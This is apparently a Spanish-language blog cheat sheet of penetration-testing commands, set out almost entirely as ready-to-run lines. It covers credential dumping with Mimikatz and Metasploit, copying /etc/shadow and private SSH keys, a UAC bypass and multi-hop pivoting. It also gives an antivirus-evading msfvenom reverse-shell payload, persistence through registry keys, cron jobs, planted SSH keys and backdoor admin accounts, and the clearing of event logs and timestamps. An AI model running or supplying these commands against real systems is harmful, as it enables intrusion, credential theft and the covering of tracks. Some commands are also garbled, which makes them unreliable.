05 junio, 2025

By  No comments

Recetas básicas para Pentest

No siempre se cuenta con suites como Kali o compendios de scripts siendo necesario correr en puro y manualmente algunas comprobaciones, por lo que vale estas recetas, machetes o chuletas

Aplicación con vulnerabilidades para practicar

Damn Vulnerable Web Application (DVWA)


Buscador de Exploits desde la línea de comandos (ExploitDB)

SearchSploit


Buscar documentación de herramientas

https://www.kali.org/tools/


Comando MySQL - Current activity and status of all client connections (threads)

MySQL SHOW FULL PROCESSLIST;


Comando con SQLMap para automatizar SQL Injection

sqlmap -u http://target.com/vuln.php?id=1 –dbs


Comando con OWASP ZAP para detectar XSS

zap-cli quick-scan –self-contained –api-key= http://target.com


Comando con Nikto para detectar RFI

nikto -h http://target.com


Comando con Burp Suite para detectar LFI (Local File Inclusion)

burpsuite

Luego, realiza un escaneo en el sitio web vulnerable.


Comando con Dirbuster para Enumeración de Directorios y Archivos Ocultos:

dirbuster -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt


Comando con Hydra para realizar fuerza bruta en un panel de administración

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form /admin/login.php=^USER^&password=^PASS^failed -vV


Comando con Sublist3r para enumerar subdominios

sublist3r -d target.com


Comando con SMBclient para enumerar recursos compartidos

smbclient -L IP_Server -U guest


Comando para escanear puertos SMB y detectar vulnerabilidades

nmap –script smb-vuln* -p445


Comando para conectarse a un recurso compartido

smbclient IP_Server -U guest


Comando para enumerar usuarios y recursos compartidos con CrackMapExec

crackmapexec smb


Metasploit para extraer los hashes del archivo SAM

 use post/windows/gather/hashdump 
 set SESSION
run


Mimikatz - Comando para extraer contraseñas en texto claro (dentro del sistema)

sekurlsa::logonpasswords


Comando para copiar el archivo shadow

cat /etc/shadow > shadow_copy.txt


Uso de John the Ripper para descifrar los hashes

john –wordlist=/ruta/diccionario.txt shadow_copy.txt


Extracción de Tokens Kerberos con Mimikatz

sekurlsa::tickets

Lista los tokens de Kerberos almacenados en la memoria del sistema -> pass the ticket


Comando para copiar una clave SSH privada

cat ~/.ssh/id_rsa > ssh_key.txt


Comando para utilizar la clave privada para iniciar sesión

ssh -i ssh_key.txt usuario@servidor


Comando en Mimikatz para Extraer credenciales RDP 

sekurlsa::msv


Metasploit - Comando para extraer credenciales de sesiones RDP activas

use post/windows/gather/credentials/rdp
set SESSION
run


Comando para evitar UAC en Metasploit Metasploit 

use exploit/windows/local/bypassuac
set SESSION
run


Comando para buscar archivos con SUID activado

find / -perm -4000 2>/dev/null


Comando para ver los permisos de sudo

sudo -l


LinPEAS: Herramienta para escanear vulnerabilidades en Linux que permiten escalación de privilegios. 

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh


WinPEAS: Versión para Windows que automatiza la búsqueda de configuraciones inseguras. 

Invoke-WebRequest -Uri https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEAS.bat -OutFile winpeas.bat
.\winpeas.bat


Comando para configurar pivoting en Metasploit 

use post/multi/manage/autoroute
set SESSION
set SUBNET
run


Ejemplo de configuración de un túnel SSH para pivoting

ssh -D 1080 -N -f usuario@servidor_comprometido


Comando para usar ProxyChains con SSH

proxychains nmap -sT -p 80 192.168.10.0/24


ProxyChains es una herramienta que facilita el uso de túneles SOCKS y puede redirigir cualquier aplicación a través del túnel.

Pivoting a través de 4 máquinas usando socat

Escenario

Máquina atacante → 2. Máquina A → 3. Máquina B → 4. Máquina C → 5. Máquina D (objetivo final)


Pasos

Máquina atacante crea un túnel con Máquina A: 

socat TCP-LISTEN:8080,fork TCP:maquina_A_IP:8888

Máquina A redirige el tráfico hacia Máquina B: 

socat TCP-LISTEN:8888,fork TCP:maquina_B_IP:9999

Máquina B redirige el tráfico hacia Máquina C: 

socat TCP-LISTEN:9999,fork TCP:maquina_C_IP:10000

Máquina C finalmente redirige el tráfico hacia Máquina D: 

socat TCP-LISTEN:10000,fork TCP:maquina_D_IP:22

Desde la Máquina atacante, puedes conectarte a la Máquina D (puerto 22) a través de todos los saltos: 

ssh -p 8080 usuario@localhost


Evasión AV

Comando en Metasploit para generar un payload ofuscado

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > payload.exe

Explicación: Este comando genera un payload cifrado utilizando el encoder shikata_ga_nai para evitar su detección por antivirus.


Comando para generar un payload ofuscado con Veil

veil
use python/meterpreter/rev_tcp
set LHOST
set LPORT
generate

Explicación: Veil genera un payload que es indetectable por la mayoría de los antivirus, utilizando técnicas de cifrado y ofuscación.


Comando para redirigir tráfico a través de un túnel SSH 

ssh -L 8080:localhost:80 usuario@servidor_comprometido


Evasion de FW

Ejemplo de configuración de socat para redirigir tráfico cifrado: 

socat openssl-listen:443,cert=cert.pem,verify=0 TCP:localhost:80


Evasión de IDS

Ejemplo de fragmentación de paquetes con Fragroute

fragroute -f fragroute.conf


Persistencia

Windows

Ejemplo de persistencia con PowerShell en la clave Run

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MyPayload /t REG_SZ /d C:\ruta\malware.exe


Comando para crear una tarea programada

schtasks /create /tn UpdateTask /tr C:\ruta\malware.exe /sc onlogon /ru SYSTEM


Ejemplo de creación de un servicio persistente

sc create MyService binPath= C:\ruta\malware.exe start= auto


Linux

Ejemplo de modificación de .bashrc

[ echo «/ruta/a/payload» >> ~/.bashrc ]


Comando para agregar un cron job

(crontab -l ; echo */5 * * * * /ruta/a/payload) | crontab –


Agregar una clave SSH maliciosa

echo ssh-rsa AAAAB3Nza… >> ~/.ssh/authorized_keys


Comando para establecer persistencia con Metasploit 

use post/windows/manage/persistence
set SESSION
set PAYLOAD windows/meterpreter/reverse_tcp
run


Comando para crear un usuario oculto (Windows): 

net user backdoor_password /add
net localgroup administrators backdoor /add


Comando para crear un usuario oculto en Linux: 

sudo useradd -m -r -s /bin/bash backdoor_user


Comando para limpiar los logs de eventos en Windows: 

wevtutil cl System
wevtutil cl Security


Comando para modificar el archivo auth.log

sudo nano /var/log/auth.log


Eliminar logs en Linux

rm /var/log/auth.log


Modificar timestamps en Linux

touch -t 202201010101.01 archivo.txt


Modificar timestamps en Windows con Metasploit

timestomp archivo.txt -m 01/01/2022 01:01:01


Comando para ocultar un archivo en Linux

mv archivo.txt .archivo.txt


Comando para eliminación segura en Linux

shred -u archivo.txt


Comando para configurar SFTP en un servidor Linux

sudo apt-get install openssh-server
sudo nano /etc/ssh/sshd_config

Dentro del archivo sshd_config, habilita el uso de SFTP: 

Subsystem sftp /usr/lib/openssh/sftp-server



0 comments:

Publicar un comentario